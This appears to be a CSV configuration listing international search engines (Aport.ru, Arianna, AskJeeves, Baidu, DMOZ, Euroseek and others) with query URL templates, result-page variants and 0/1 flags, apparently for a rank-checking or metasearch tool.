"International","Aport.ru 4 (Next 10)","http://sm.aport.ru/scripts/template.dll?r={SEARCH_KEYWORD}&id=44584098&p=3&HID=1_2_3_4","0"
"International","Aport.ru 4 (Next 10)","http://sm.aport.ru/scripts/template.dll?r={SEARCH_KEYWORD}&id=44584098&p=3&HID=1_2_3_4","0"
"International","Aport.ru 5 (Next 10)","http://sm.aport.ru/scripts/template.dll?r={SEARCH_KEYWORD}&id=44584098&p=4&HID=1_2_3_4","1"
"International","Aport.ru 5 (Next 10)","http://sm.aport.ru/scripts/template.dll?r={SEARCH_KEYWORD}&id=44584098&p=4&HID=1_2_3_4","0"
"International","Aport.ru 5 (Next 10)","http://sm.aport.ru/scripts/template.dll?r={SEARCH_KEYWORD}&id=44584098&p=4&HID=1_2_3_4","0"
"International","Aport.ru 5 (Next 10)","http://sm.aport.ru/scripts/template.dll?r={SEARCH_KEYWORD}&id=44584098&p=4&HID=1_2_3_4","0"
"International","Aport.ru 5 (Next 10)","http://sm.aport.ru/scripts/template.dll?r={SEARCH_KEYWORD}&id=44584098&p=4&HID=1_2_3_4","0"
"International","Aport.ru 5 (Next 10)","http://sm.aport.ru/scripts/template.dll?r={SEARCH_KEYWORD}&id=44584098&p=4&HID=1_2_3_4","0"
"International","Arianna","http://arianna.libero.it/search/abin/search?radiobutton=italia&query={SEARCH_KEYWORD}","1"
"International","Arianna","http://arianna.libero.it/search/abin/search?radiobutton=italia&query={SEARCH_KEYWORD}","0"
"International","Arianna","http://arianna.libero.it/search/abin/search?radiobutton=italia&query={SEARCH_KEYWORD}","0"
"International","Arianna","http://arianna.libero.it/search/abin/search?radiobutton=italia&query={SEARCH_KEYWORD}","0"
"International","Arianna","http://arianna.libero.it/search/abin/search?radiobutton=italia&query={SEARCH_KEYWORD}","0"
"International","Arianna","http://arianna.libero.it/search/abin/search?radiobutton=italia&query={SEARCH_KEYWORD}","0"
"International","Arianna 2 (Next 10)","http://arianna.libero.it/search/abin/search?pag=2&query={SEARCH_KEYWORD}&s=2&np=38&start=10","1"
"International","Arianna 2 (Next 10)","http://arianna.libero.it/search/abin/search?pag=2&query={SEARCH_KEYWORD}&s=2&np=38&start=10","0"
"International","Arianna 2 (Next 10)","http://arianna.libero.it/search/abin/search?pag=2&query={SEARCH_KEYWORD}&s=2&np=38&start=10","0"
"International","Arianna 2 (Next 10)","http://arianna.libero.it/search/abin/search?pag=2&query={SEARCH_KEYWORD}&s=2&np=38&start=10","0"
"International","Arianna 2 (Next 10)","http://arianna.libero.it/search/abin/search?pag=2&query={SEARCH_KEYWORD}&s=2&np=38&start=10","0"
"International","Arianna 2 (Next 10)","http://arianna.libero.it/search/abin/search?pag=2&query={SEARCH_KEYWORD}&s=2&np=38&start=10","0"
"International","Arianna 3 (Next 10)","http://arianna.libero.it/search/abin/search?pag=3&query={SEARCH_KEYWORD}&s=2&np=38&start=20","1"
"International","Arianna 3 (Next 10)","http://arianna.libero.it/search/abin/search?pag=3&query={SEARCH_KEYWORD}&s=2&np=38&start=20","0"
"International","Arianna 3 (Next 10)","http://arianna.libero.it/search/abin/search?pag=3&query={SEARCH_KEYWORD}&s=2&np=38&start=20","0"
"International","Arianna 3 (Next 10)","http://arianna.libero.it/search/abin/search?pag=3&query={SEARCH_KEYWORD}&s=2&np=38&start=20","0"
"International","Arianna 3 (Next 10)","http://arianna.libero.it/search/abin/search?pag=3&query={SEARCH_KEYWORD}&s=2&np=38&start=20","0"
"International","Arianna 3 (Next 10)","http://arianna.libero.it/search/abin/search?pag=3&query={SEARCH_KEYWORD}&s=2&np=38&start=20","0"
"International","Arianna 4 (Next 10)","http://arianna.libero.it/search/abin/search?pag=4&query={SEARCH_KEYWORD}&s=2&np=38&start=30","1"
"International","Arianna 4 (Next 10)","http://arianna.libero.it/search/abin/search?pag=4&query={SEARCH_KEYWORD}&s=2&np=38&start=30","0"
"International","Arianna 4 (Next 10)","http://arianna.libero.it/search/abin/search?pag=4&query={SEARCH_KEYWORD}&s=2&np=38&start=30","0"
"International","Arianna 4 (Next 10)","http://arianna.libero.it/search/abin/search?pag=4&query={SEARCH_KEYWORD}&s=2&np=38&start=30","0"
"International","Arianna 4 (Next 10)","http://arianna.libero.it/search/abin/search?pag=4&query={SEARCH_KEYWORD}&s=2&np=38&start=30","0"
"International","Arianna 4 (Next 10)","http://arianna.libero.it/search/abin/search?pag=4&query={SEARCH_KEYWORD}&s=2&np=38&start=30","0"
"International","Arianna 5 (Next 10)","http://arianna.libero.it/search/abin/search?pag=5&query={SEARCH_KEYWORD}&s=2&np=38&start=40","1"
"International","Arianna 5 (Next 10)","http://arianna.libero.it/search/abin/search?pag=5&query={SEARCH_KEYWORD}&s=2&np=38&start=40","0"
"International","Arianna 5 (Next 10)","http://arianna.libero.it/search/abin/search?pag=5&query={SEARCH_KEYWORD}&s=2&np=38&start=40","0"
"International","Arianna 5 (Next 10)","http://arianna.libero.it/search/abin/search?pag=5&query={SEARCH_KEYWORD}&s=2&np=38&start=40","0"
"International","Arianna 5 (Next 10)","http://arianna.libero.it/search/abin/search?pag=5&query={SEARCH_KEYWORD}&s=2&np=38&start=40","0"
"International","Arianna 5 (Next 10)","http://arianna.libero.it/search/abin/search?pag=5&query={SEARCH_KEYWORD}&s=2&np=38&start=40","0"
"International","Asiaco Japan","http://search.asiaco.com/spider-bin/do/spider.cgi?how=and&where=web&qry={SEARCH_KEYWORD}","1"
"International","Asiaco Japan","http://search.asiaco.com/spider-bin/do/spider.cgi?how=and&where=web&qry={SEARCH_KEYWORD}","0"
"International","Asiaco Japan","http://search.asiaco.com/spider-bin/do/spider.cgi?how=and&where=web&qry={SEARCH_KEYWORD}","0"
"International","Asiaco Japan","http://search.asiaco.com/spider-bin/do/spider.cgi?how=and&where=web&qry={SEARCH_KEYWORD}","0"
"International","Asiaco Japan","http://search.asiaco.com/spider-bin/do/spider.cgi?how=and&where=web&qry={SEARCH_KEYWORD}","0"
"International","Asiaco Japan","http://search.asiaco.com/spider-bin/do/spider.cgi?how=and&where=web&qry={SEARCH_KEYWORD}","0"
"International","AskJeeves","http://askjeeves.com/main/askjeeves.asp?ask={SEARCH_KEYWORD}&o=0","1"
"International","AskJeeves","http://web.ask.com/web?q={SEARCH_KEYWORD}&qsrc=0&o=0","0"
"International","AskJeeves","http://web.ask.com/web?q={SEARCH_KEYWORD}&qsrc=0&o=0","0"
"International","AskJeeves","http://web.ask.com/web?q={SEARCH_KEYWORD}&qsrc=0&o=0","0"
"International","AskJeeves 2 (Next 10)","http://web.ask.com/web?q={SEARCH_KEYWORD}&o=0&qsrc=0&qid=EBCD0147A041E1E08BF7A07038FF0765&page=2","1"
"International","AskJeeves 2 (Next 10)","http://web.ask.com/web?q={SEARCH_KEYWORD}&o=0&qsrc=0&qid=EBCD0147A041E1E08BF7A07038FF0765&page=2","0"
"International","AskJeeves 2 (Next 10)","http://web.ask.com/web?q={SEARCH_KEYWORD}&o=0&qsrc=0&qid=EBCD0147A041E1E08BF7A07038FF0765&page=2","0"
"International","AskJeeves 3 (Next 10)","http://web.ask.com/web?q={SEARCH_KEYWORD}&o=0&qsrc=0&qid=EBCD0147A041E1E08BF7A07038FF0765&page=3","0"
"International","AskJeeves 3 (Next 10)","http://web.ask.com/web?q={SEARCH_KEYWORD}&o=0&qsrc=0&qid=EBCD0147A041E1E08BF7A07038FF0765&page=3","0"
"International","AskJeeves 3 (Next 10)","http://web.ask.com/web?q={SEARCH_KEYWORD}&o=0&qsrc=0&qid=EBCD0147A041E1E08BF7A07038FF0765&page=3","1"
"International","AskJeeves 4 (Next 10)","http://web.ask.com/web?q={SEARCH_KEYWORD}&o=0&qsrc=0&qid=EBCD0147A041E1E08BF7A07038FF0765&page=4","0"
"International","AskJeeves 4 (Next 10)","http://web.ask.com/web?q={SEARCH_KEYWORD}&o=0&qsrc=0&qid=EBCD0147A041E1E08BF7A07038FF0765&page=4","0"
"International","AskJeeves 4 (Next 10)","http://web.ask.com/web?q={SEARCH_KEYWORD}&o=0&qsrc=0&qid=EBCD0147A041E1E08BF7A07038FF0765&page=4","1"
"International","AskJeeves 5 (Next 10)","http://web.ask.com/web?q={SEARCH_KEYWORD}&o=0&qsrc=0&qid=EBCD0147A041E1E08BF7A07038FF0765&page=5","0"
"International","AskJeeves 5 (Next 10)","http://web.ask.com/web?q={SEARCH_KEYWORD}&o=0&qsrc=0&qid=EBCD0147A041E1E08BF7A07038FF0765&page=5","0"
"International","AskJeeves 5 (Next 10)","http://web.ask.com/web?q={SEARCH_KEYWORD}&o=0&qsrc=0&qid=EBCD0147A041E1E08BF7A07038FF0765&page=5","1"
"International","auskunft CH","http://www.auskunft.ch/search.asp?q={SEARCH_KEYWORD}","1"
"International","auskunft CH","http://www.auskunft.ch/search.asp?q={SEARCH_KEYWORD}","0"
"International","auskunft CH","http://www.auskunft.ch/search.asp?q={SEARCH_KEYWORD}","0"
"International","auskunft CH 2 (Next 10)","http://www.auskunft.ch/search.asp?q={SEARCH_KEYWORD}&f=11&m=20","1"
"International","auskunft CH 2 (Next 10)","http://www.auskunft.ch/search.asp?q={SEARCH_KEYWORD}&f=11&m=20","0"
"International","auskunft CH 2 (Next 10)","http://www.auskunft.ch/search.asp?q={SEARCH_KEYWORD}&f=11&m=20","0"
"International","auskunft CH 3 (Next 10)","http://www.auskunft.ch/search.asp?q={SEARCH_KEYWORD}&f=21&m=30","1"
"International","auskunft CH 3 (Next 10)","http://www.auskunft.ch/search.asp?q={SEARCH_KEYWORD}&f=21&m=30","0"
"International","auskunft CH 3 (Next 10)","http://www.auskunft.ch/search.asp?q={SEARCH_KEYWORD}&f=21&m=30","0"
"International","auskunft CH 4 (Next 10)","http://www.auskunft.ch/search.asp?q={SEARCH_KEYWORD}&f=31&m=40","1"
"International","auskunft CH 4 (Next 10)","http://www.auskunft.ch/search.asp?q={SEARCH_KEYWORD}&f=31&m=40","0"
"International","auskunft CH 4 (Next 10)","http://www.auskunft.ch/search.asp?q={SEARCH_KEYWORD}&f=31&m=40","0"
"International","auskunft CH 5 (Next 10)","http://www.auskunft.ch/search.asp?q={SEARCH_KEYWORD}&f=41&m=50","1"
"International","auskunft CH 5 (Next 10)","http://www.auskunft.ch/search.asp?q={SEARCH_KEYWORD}&f=41&m=50","0"
"International","auskunft CH 5 (Next 10)","http://www.auskunft.ch/search.asp?q={SEARCH_KEYWORD}&f=41&m=50","0"
"International","Baidu","http://www.baidu.com/s?lm=0&si=&rn=100&tn=baiduadv&ie=gb2312&ct=0&wd={SEARCH_KEYWORD}&pn=0&cl=3","1"
"International","Baidu 2 (Next 100)","http://www.baidu.com/s?lm=0&si=&rn=100&tn=baiduadv&ie=gb2312&ct=0&wd={SEARCH_KEYWORD}&pn=100&cl=3","1"
"International","Baidu 3 (Next 100)","http://www.baidu.com/s?lm=0&si=&rn=100&tn=baiduadv&ie=gb2312&ct=0&wd={SEARCH_KEYWORD}&pn=200&cl=3","1"
"International","Baidu 4 (Next 100)","http://www.baidu.com/s?lm=0&si=&rn=100&tn=baiduadv&ie=gb2312&ct=0&wd={SEARCH_KEYWORD}&pn=300&cl=3","1"
"International","Baidu 5 (Next 100)","http://www.baidu.com/s?lm=0&si=&rn=100&tn=baiduadv&ie=gb2312&ct=0&wd={SEARCH_KEYWORD}&pn=400&cl=3","1"
"International","Baldie","http://ixquick.com/do/metasearch.pl?dyn=1&cat=web&cmd=process_search&rl=BALDEY&language=english&query={SEARCH_KEYWORD}","1"
"International","Baldie","http://ixquick.com/do/metasearch.pl?dyn=1&cat=web&cmd=process_search&rl=BALDEY&language=english&query={SEARCH_KEYWORD}","0"
"International","Baldie","http://ixquick.com/do/metasearch.pl?dyn=1&cat=web&cmd=process_search&rl=BALDEY&language=english&query={SEARCH_KEYWORD}","0"
"International","Baldie","http://ixquick.com/do/metasearch.pl?dyn=1&cat=web&cmd=process_search&rl=BALDEY&language=english&query={SEARCH_KEYWORD}","0"
"International","Baldie","http://ixquick.com/do/metasearch.pl?dyn=1&cat=web&cmd=process_search&rl=BALDEY&language=english&query={SEARCH_KEYWORD}","0"
"International","Baldie","http://ixquick.com/do/metasearch.pl?dyn=1&cat=web&cmd=process_search&rl=BALDEY&language=english&query={SEARCH_KEYWORD}","0"
"International","Baldie 2 (Next 10)","http://s8.baldey.ixquick.com/do/metasearch.pl?cmd=process_search&startat=10&language=english&qid=NILKPQMKRNPQ&query={SEARCH_KEYWORD}&cat=web&rl=BALDEY&dyn=1&lui=english","1"
"International","Baldie 2 (Next 10)","http://s8.baldey.ixquick.com/do/metasearch.pl?cmd=process_search&startat=10&language=english&qid=NILKPQMKRNPQ&query={SEARCH_KEYWORD}&cat=web&rl=BALDEY&dyn=1&lui=english","0"
"International","Baldie 2 (Next 10)","http://s8.baldey.ixquick.com/do/metasearch.pl?cmd=process_search&startat=10&language=english&qid=NILKPQMKRNPQ&query={SEARCH_KEYWORD}&cat=web&rl=BALDEY&dyn=1&lui=english","0"
"International","Baldie 2 (Next 10)","http://s8.baldey.ixquick.com/do/metasearch.pl?cmd=process_search&startat=10&language=english&qid=NILKPQMKRNPQ&query={SEARCH_KEYWORD}&cat=web&rl=BALDEY&dyn=1&lui=english","0"
"International","Baldie 2 (Next 10)","http://s8.baldey.ixquick.com/do/metasearch.pl?cmd=process_search&startat=10&language=english&qid=NILKPQMKRNPQ&query={SEARCH_KEYWORD}&cat=web&rl=BALDEY&dyn=1&lui=english","0"
"International","Baldie 2 (Next 10)","http://s8.baldey.ixquick.com/do/metasearch.pl?cmd=process_search&startat=10&language=english&qid=NILKPQMKRNPQ&query={SEARCH_KEYWORD}&cat=web&rl=BALDEY&dyn=1&lui=english","0"
"International","Baldie 3 (Next 10)","http://s8.baldey.ixquick.com/do/metasearch.pl?cmd=process_search&startat=20&language=english&qid=NILKPQMKRNPQ&query={SEARCH_KEYWORD}&cat=web&rl=BALDEY&dyn=1&lui=english","1"
"International","Baldie 3 (Next 10)","http://s8.baldey.ixquick.com/do/metasearch.pl?cmd=process_search&startat=20&language=english&qid=NILKPQMKRNPQ&query={SEARCH_KEYWORD}&cat=web&rl=BALDEY&dyn=1&lui=english","0"
"International","Baldie 3 (Next 10)","http://s8.baldey.ixquick.com/do/metasearch.pl?cmd=process_search&startat=20&language=english&qid=NILKPQMKRNPQ&query={SEARCH_KEYWORD}&cat=web&rl=BALDEY&dyn=1&lui=english","0"
"International","Baldie 3 (Next 10)","http://s8.baldey.ixquick.com/do/metasearch.pl?cmd=process_search&startat=20&language=english&qid=NILKPQMKRNPQ&query={SEARCH_KEYWORD}&cat=web&rl=BALDEY&dyn=1&lui=english","0"
"International","Baldie 3 (Next 10)","http://s8.baldey.ixquick.com/do/metasearch.pl?cmd=process_search&startat=20&language=english&qid=NILKPQMKRNPQ&query={SEARCH_KEYWORD}&cat=web&rl=BALDEY&dyn=1&lui=english","0"
"International","Baldie 3 (Next 10)","http://s8.baldey.ixquick.com/do/metasearch.pl?cmd=process_search&startat=20&language=english&qid=NILKPQMKRNPQ&query={SEARCH_KEYWORD}&cat=web&rl=BALDEY&dyn=1&lui=english","0"
"International","Baldie 4 (Next 10)","http://s8.baldey.ixquick.com/do/metasearch.pl?cmd=process_search&startat=30&language=english&qid=NILKPQMKRNPQ&query={SEARCH_KEYWORD}&cat=web&rl=BALDEY&dyn=1&lui=english","1"
"International","Baldie 4 (Next 10)","http://s8.baldey.ixquick.com/do/metasearch.pl?cmd=process_search&startat=30&language=english&qid=NILKPQMKRNPQ&query={SEARCH_KEYWORD}&cat=web&rl=BALDEY&dyn=1&lui=english","0"
"International","Baldie 4 (Next 10)","http://s8.baldey.ixquick.com/do/metasearch.pl?cmd=process_search&startat=30&language=english&qid=NILKPQMKRNPQ&query={SEARCH_KEYWORD}&cat=web&rl=BALDEY&dyn=1&lui=english","0"
"International","Baldie 4 (Next 10)","http://s8.baldey.ixquick.com/do/metasearch.pl?cmd=process_search&startat=30&language=english&qid=NILKPQMKRNPQ&query={SEARCH_KEYWORD}&cat=web&rl=BALDEY&dyn=1&lui=english","0"
"International","Baldie 4 (Next 10)","http://s8.baldey.ixquick.com/do/metasearch.pl?cmd=process_search&startat=30&language=english&qid=NILKPQMKRNPQ&query={SEARCH_KEYWORD}&cat=web&rl=BALDEY&dyn=1&lui=english","0"
"International","Baldie 4 (Next 10)","http://s8.baldey.ixquick.com/do/metasearch.pl?cmd=process_search&startat=30&language=english&qid=NILKPQMKRNPQ&query={SEARCH_KEYWORD}&cat=web&rl=BALDEY&dyn=1&lui=english","0"
"International","Caloweb","http://www.caloweb.com/s?k={SEARCH_KEYWORD}&m=t","1"
"International","Caloweb","http://www.caloweb.com/s?k={SEARCH_KEYWORD}&m=t","0"
"International","Caloweb","http://www.caloweb.com/s?k={SEARCH_KEYWORD}&m=t","0"
"International","Caloweb 2 (Next 8)","http://www.caloweb.com/s?k={SEARCH_KEYWORD}&b=8&m=t&t=1056465679937","1"
"International","Caloweb 2 (Next 8)","http://www.caloweb.com/s?k={SEARCH_KEYWORD}&b=8&m=t&t=1056465679937","0"
"International","Caloweb 2 (Next 8)","http://www.caloweb.com/s?k={SEARCH_KEYWORD}&b=8&m=t&t=1056465679937","0"
"International","Caloweb 3 (Next 8)","http://www.caloweb.com/s?k={SEARCH_KEYWORD}&b=16&m=t&t=1056465713703","1"
"International","Caloweb 3 (Next 8)","http://www.caloweb.com/s?k={SEARCH_KEYWORD}&b=16&m=t&t=1056465713703","0"
"International","Caloweb 3 (Next 8)","http://www.caloweb.com/s?k={SEARCH_KEYWORD}&b=16&m=t&t=1056465713703","0"
"International","Caloweb 4 (Next 8)","http://www.caloweb.com/s?k={SEARCH_KEYWORD}&b=24&m=t&t=1056465762828","1"
"International","Caloweb 4 (Next 8)","http://www.caloweb.com/s?k={SEARCH_KEYWORD}&b=24&m=t&t=1056465762828","0"
"International","Caloweb 4 (Next 8)","http://www.caloweb.com/s?k={SEARCH_KEYWORD}&b=24&m=t&t=1056465762828","0"
"International","Caloweb 5 (Next 8)","http://www.caloweb.com/s?k={SEARCH_KEYWORD}&b=32&m=t&t=1056465786390","1"
"International","Caloweb 5 (Next 8)","http://www.caloweb.com/s?k={SEARCH_KEYWORD}&b=32&m=t&t=1056465786390","0"
"International","Caloweb 5 (Next 8)","http://www.caloweb.com/s?k={SEARCH_KEYWORD}&b=32&m=t&t=1056465786390","0"
"International","DMOZ","http://search.dmoz.org/cgi-bin/search?search={SEARCH_KEYWORD}&utf8=1&locale=en_us","1"
"International","DMOZ","http://search.dmoz.org/cgi-bin/search?search={SEARCH_KEYWORD}&utf8=1&locale=en_us","0"
"International","DMOZ 2 (Next 20)","http://search.dmoz.org/cgi-bin/search?search={SEARCH_KEYWORD}&utf8=1&locale=en_us&start=21","1"
"International","DMOZ 2 (Next 20)","http://search.dmoz.org/cgi-bin/search?search={SEARCH_KEYWORD}&utf8=1&locale=en_us&start=21","0"
"International","DMOZ 3 (Next 20)","http://search.dmoz.org/cgi-bin/search?search={SEARCH_KEYWORD}&utf8=1&locale=en_us&start=41","1"
"International","DMOZ 3 (Next 20)","http://search.dmoz.org/cgi-bin/search?search={SEARCH_KEYWORD}&utf8=1&locale=en_us&start=41","0"
"International","DMOZ 4 (Next 20)","http://search.dmoz.org/cgi-bin/search?search={SEARCH_KEYWORD}&utf8=1&locale=en_us&start=61","1"
"International","DMOZ 4 (Next 20)","http://search.dmoz.org/cgi-bin/search?search={SEARCH_KEYWORD}&utf8=1&locale=en_us&start=61","0"
"International","DMOZ 5 (Next 20)","http://search.dmoz.org/cgi-bin/search?search={SEARCH_KEYWORD}&utf8=1&locale=en_us&start=81","1"
"International","DMOZ 5 (Next 20)","http://search.dmoz.org/cgi-bin/search?search={SEARCH_KEYWORD}&utf8=1&locale=en_us&start=81","0"
"International","Dogpile","http://search.dogpile.com/texis/search?q={SEARCH_KEYWORD}&geo=no&fs=web","1"
"International","Dogpile","http://search.dogpile.com/texis/search?q={SEARCH_KEYWORD}&geo=no&fs=web","0"
"International","Dogpile","http://search.dogpile.com/texis/search?q={SEARCH_KEYWORD}&geo=no&fs=web","0"
"International","Empas KR","http://search.empas.com/search/all.html?q={SEARCH_KEYWORD}&qn=&m=B&n=15&ac=&rv=0&sd=0&v=3&w=d4&cs=A&ss=A&l=20-5-18-372176-t&s=t&z=A&e=1","1"
"International","Empas KR","http://search.empas.com/search/all.html?q={SEARCH_KEYWORD}&qn=&m=B&n=15&ac=&rv=0&sd=0&v=3&w=d4&cs=A&ss=A&l=20-5-18-372176-t&s=t&z=A&e=1","0"
"International","Empas KR","http://search.empas.com/search/all.html?q={SEARCH_KEYWORD}&qn=&m=B&n=15&ac=&rv=0&sd=0&v=3&w=d4&cs=A&ss=A&l=20-5-18-372176-t&s=t&z=A&e=1","0"
"International","Empas KR","http://search.empas.com/search/all.html?q={SEARCH_KEYWORD}&qn=&m=B&n=15&ac=&rv=0&sd=0&v=3&w=d4&cs=A&ss=A&l=20-5-18-372176-t&s=t&z=A&e=1","0"
"International","Empas KR","http://search.empas.com/search/all.html?q={SEARCH_KEYWORD}&qn=&m=B&n=15&ac=&rv=0&sd=0&v=3&w=d4&cs=A&ss=A&l=20-5-18-372176-t&s=t&z=A&e=1","0"
"International","Empas KR","http://search.empas.com/search/all.html?q={SEARCH_KEYWORD}&qn=&m=B&n=15&ac=&rv=0&sd=0&v=3&w=d4&cs=A&ss=A&l=20-5-18-372176-t&s=t&z=A&e=1","0"
"International","Empas KR 2 (Next )","http://search.empas.com/search/all.html?q={SEARCH_KEYWORD}&qn=&m=B&n=15&ac=&rv=0&sd=0&v=3&w=&cs=A&ss=A&l=20-5-18--t&s=t&z=A&e=16","1"
"International","Empas KR 2 (Next )","http://search.empas.com/search/all.html?q={SEARCH_KEYWORD}&qn=&m=B&n=15&ac=&rv=0&sd=0&v=3&w=&cs=A&ss=A&l=20-5-18--t&s=t&z=A&e=16","0"
"International","Empas KR 2 (Next )","http://search.empas.com/search/all.html?q={SEARCH_KEYWORD}&qn=&m=B&n=15&ac=&rv=0&sd=0&v=3&w=&cs=A&ss=A&l=20-5-18--t&s=t&z=A&e=16","0"
"International","Empas KR 2 (Next )","http://search.empas.com/search/all.html?q={SEARCH_KEYWORD}&qn=&m=B&n=15&ac=&rv=0&sd=0&v=3&w=&cs=A&ss=A&l=20-5-18--t&s=t&z=A&e=16","0"
"International","Empas KR 2 (Next )","http://search.empas.com/search/all.html?q={SEARCH_KEYWORD}&qn=&m=B&n=15&ac=&rv=0&sd=0&v=3&w=&cs=A&ss=A&l=20-5-18--t&s=t&z=A&e=16","0"
"International","Empas KR 2 (Next )","http://search.empas.com/search/all.html?q={SEARCH_KEYWORD}&qn=&m=B&n=15&ac=&rv=0&sd=0&v=3&w=&cs=A&ss=A&l=20-5-18--t&s=t&z=A&e=16","1"
"International","Euroseek","http://www.euroseek.com/search/?string={SEARCH_KEYWORD}&lang=lang_en&country=world&Submit=Search","1"
"International","Euroseek","http://euroseek.com/system/search.cgi?language=en&mode=internet&start=10&string={SEARCH_KEYWORD}","0"
"International","Euroseek","http://euroseek.com/system/search.cgi?language=en&mode=internet&start=10&string={SEARCH_KEYWORD}","0"
"International","Euroseek","http://www.euroseek.com/search/?string={SEARCH_KEYWORD}&lang=lang_en&country=world&Submit=Search","0"
"International","Euroseek","http://www.euroseek.com/search/?string={SEARCH_KEYWORD}&lang=lang_en&country=world&Submit=Search","0"
"International","Euroseek","http://euroseek.com/system/search.cgi?language=en&mode=internet&start=10&string={SEARCH_KEYWORD}","0"
"International","Euroseek 2 (Next 10)","http://www.euroseek.com/search/?string={SEARCH_KEYWORD}&start=10&page=2&lang=lang_en&country=world","1"
"International","Euroseek 2 (Next 10)","http://euroseek.com/system/search.cgi?language=en&mode=internet&start=20&string={SEARCH_KEYWORD}","0"
"International","Euroseek 2 (Next 10)","http://euroseek.com/system/search.cgi?language=en&mode=internet&start=20&string={SEARCH_KEYWORD}","0"
"International","Euroseek 2 (Next 10)","http://www.euroseek.com/search/?string={SEARCH_KEYWORD}&start=10&page=2&lang=lang_en&country=world","0"
"International","Euroseek 2 (Next 10)","http://www.euroseek.com/search/?string={SEARCH_KEYWORD}&start=10&page=2&lang=lang_en&country=world","0"
"International","Euroseek 2 (Next 10)","http://euroseek.com/system/search.cgi?language=en&mode=internet&start=20&string={SEARCH_KEYWORD}","0"
"International","Euroseek 3 (Next 10)","http://www.euroseek.com/search/?string={SEARCH_KEYWORD}&start=20&page=3&lang=lang_en&country=world","1"
"International","Euroseek 3 (Next 10)","http://euroseek.com/system/search.cgi?language=en&mode=internet&start=30&string={SEARCH_KEYWORD}","0"
"International","Euroseek 3 (Next 10)","http://euroseek.com/system/search.cgi?language=en&mode=internet&start=30&string={SEARCH_KEYWORD}","0"
"International","Euroseek 3 (Next 10)","http://www.euroseek.com/search/?string={SEARCH_KEYWORD}&start=20&page=3&lang=lang_en&country=world","0"
"International","Euroseek 3 (Next 10)","http://www.euroseek.com/search/?string={SEARCH_KEYWORD}&start=20&page=3&lang=lang_en&country=world","0"
"International","Euroseek 3 (Next 10)","http://euroseek.com/system/search.cgi?language=en&mode=internet&start=30&string={SEARCH_KEYWORD}","0"
"International","Euroseek 4 (Next 10)","http://euroseek.com/system/search.cgi?language=en&mode=internet&start=40&string={SEARCH_KEYWORD}","0"
"International","Euroseek 4 (Next 10)","http://euroseek.com/system/search.cgi?language=en&mode=internet&start=40&string={SEARCH_KEYWORD}","0"
"International","Euroseek 4 (Next 10)","http://euroseek.com/system/search.cgi?language=en&mode=internet&start=40&string={SEARCH_KEYWORD}","1"
"International","Euroseek 5 (Next 10)","http://euroseek.com/system/search.cgi?language=en&mode=internet&start=50&string={SEARCH_KEYWORD}","0"
"International","Euroseek 5 (Next 10)","http://euroseek.com/system/search.cgi?language=en&mode=internet&start=50&string={SEARCH_KEYWORD}","0"
"International","Euroseek 5 (Next 10)","http://euroseek.com/system/search.cgi?language=en&mode=internet&start=50&string={SEARCH_KEYWORD}","1"
"International","EuroSeek DE","http://www.euroseek.com/search/index.cgi?string={SEARCH_KEYWORD}&lang=lang_de","1"
"International","EuroSeek DE","http://www.euroseek.com/search/index.cgi?string={SEARCH_KEYWORD}&lang=lang_de","0"
"International","EuroSeek DE","http://www.euroseek.com/search/index.cgi?string={SEARCH_KEYWORD}&lang=lang_de","0"
"International","EuroSeek DE","http://www.euroseek.com/search/index.cgi?string={SEARCH_KEYWORD}&lang=lang_de","0"
"International","EuroSeek DE","http://www.euroseek.com/search/index.cgi?string={SEARCH_KEYWORD}&lang=lang_de","0"
"International","EuroSeek DE","http://www.euroseek.com/search/index.cgi?string={SEARCH_KEYWORD}&lang=lang_de","0"
"International","EuroSeek DE 2 (Next 10)","http://www.euroseek.com/search/index.cgi?lang=lang_de&string={SEARCH_KEYWORD}&start=10&page=2&lang=lang_de","1"
"International","EuroSeek DE 2 (Next 10)","http://www.euroseek.com/search/index.cgi?lang=lang_de&string={SEARCH_KEYWORD}&start=10&page=2&lang=lang_de","0"
"International","EuroSeek DE 2 (Next 10)","http://www.euroseek.com/search/index.cgi?lang=lang_de&string={SEARCH_KEYWORD}&start=10&page=2&lang=lang_de","0"
"International","EuroSeek DE 2 (Next 10)","http://www.euroseek.com/search/index.cgi?lang=lang_de&string={SEARCH_KEYWORD}&start=10&page=2&lang=lang_de","0"
"International","EuroSeek DE 2 (Next 10)","http://www.euroseek.com/search/index.cgi?lang=lang_de&string={SEARCH_KEYWORD}&start=10&page=2&lang=lang_de","0"
"International","EuroSeek DE 2 (Next 10)","http://www.euroseek.com/search/index.cgi?lang=lang_de&string={SEARCH_KEYWORD}&start=10&page=2&lang=lang_de","0"
"International","EuroSeek DE 3 (Next 10)","http://www.euroseek.com/search/index.cgi?lang=lang_de&string={SEARCH_KEYWORD}&start=20&page=3&lang=lang_de","1"
"International","EuroSeek DE 3 (Next 10)","http://www.euroseek.com/search/index.cgi?lang=lang_de&string={SEARCH_KEYWORD}&start=20&page=3&lang=lang_de","0"
"International","EuroSeek DE 3 (Next 10)","http://www.euroseek.com/search/index.cgi?lang=lang_de&string={SEARCH_KEYWORD}&start=20&page=3&lang=lang_de","0"
"International","EuroSeek DE 3 (Next 10)","http://www.euroseek.com/search/index.cgi?lang=lang_de&string={SEARCH_KEYWORD}&start=20&page=3&lang=lang_de","0"
"International","EuroSeek DE 3 (Next 10)","http://www.euroseek.com/search/index.cgi?lang=lang_de&string={SEARCH_KEYWORD}&start=20&page=3&lang=lang_de","0"
"International","EuroSeek DE 3 (Next 10)","http://www.euroseek.com/search/index.cgi?lang=lang_de&string={SEARCH_KEYWORD}&start=20&page=3&lang=lang_de","0"
"International","EuroSeek DE 4 (Next 10)","http://www.euroseek.com/search/index.cgi?lang=lang_de&string={SEARCH_KEYWORD}&start=30&page=4&lang=lang_de","1"
"International","EuroSeek DE 4 (Next 10)","http://www.euroseek.com/search/index.cgi?lang=lang_de&string={SEARCH_KEYWORD}&start=30&page=4&lang=lang_de","0"
"International","EuroSeek DE 4 (Next 10)","http://www.euroseek.com/search/index.cgi?lang=lang_de&string={SEARCH_KEYWORD}&start=30&page=4&lang=lang_de","0"
"International","EuroSeek DE 4 (Next 10)","http://www.euroseek.com/search/index.cgi?lang=lang_de&string={SEARCH_KEYWORD}&start=30&page=4&lang=lang_de","0"
"International","EuroSeek DE 4 (Next 10)","http://www.euroseek.com/search/index.cgi?lang=lang_de&string={SEARCH_KEYWORD}&start=30&page=4&lang=lang_de","0"
"International","EuroSeek DE 4 (Next 10)","http://www.euroseek.com/search/index.cgi?lang=lang_de&string={SEARCH_KEYWORD}&start=30&page=4&lang=lang_de","0"
